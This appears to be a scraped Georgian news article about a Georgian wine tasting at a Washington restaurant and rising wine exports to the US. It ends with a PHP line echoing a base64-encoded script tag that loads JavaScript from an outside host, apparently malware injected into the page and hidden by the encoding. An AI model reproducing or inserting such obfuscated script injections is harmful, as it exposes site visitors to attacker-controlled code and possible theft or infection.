celsiusi
ავერსი შნაიდერი
ვაშინგტონში მდებარე მიშელინის ვარსკვლავის მქონე ერთ-ერთ ცნობილ რესტორანში „Maydan“ ქართული ღვინის დეგუსტაცია იმპორტიორების, ღვინის პროფესიონალების, მედიის, სარესტორნო და სავაჭრო  ქსელების წარმომადგენლებისთვის გაიმართა. 
 
როგორც WWW.BUSINESSTIME.GE-ის ღვინის ეროვნული სააგენტოდან აცნობეს, ქართული ღვინის წარდგენას აშშ-ში საქართველოს ელჩი დავით ბაქრაძე დაესწრო. ღონისძიებაზე წარმოდგენილი  იყო ქართული ღვინოები, რომლებიც უკვე იყიდება აშშ- ბაზარზე და 60-მდე ისეთი ნიმუში, რომელსაც ამერიკელი მომხმარებელი ჯერ არ იცნობს.
 
ღვინის ეროვნული სააგენტოს კონტრაქტორი მარკეტინგული კომპანიის ,,Marq Energie Consulting’’ ორგანიზებით, ქართული ღვინის დეგუსტაციები ასევე გაიმართება სან-ფრანცისკოში, 6 ოქტომბერს და ნიუ-იორკში, 18 ოქტომბერს. 
 
ამერიკის შეერთებული შტატები ქართული ღვინის სტრატეგიულ ბაზარს წარმოადგენს, სადაც, ღვინის ეროვნული სააგენტოს მიერ, ღვინის კერძო ინდუსტრიასთან თანამშრომლობით, თანმიმდევრული მარკეტინგული სტრატეგია  ხორციელდება. შედეგად,  ქართული ღვინის ექსპორტი აშშ-ის ბაზარზე სტაბილურად მზარდია. მიმდინარე წლის იანვარ-აგვისტოში ექსპორტირებულია  700 ათასი ბოთლი ღვინო, ზრდამ, გასული წლის ანალოგიურ პერიოდთან შედარებით, 26% შეადგინა.
 
 
1191
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");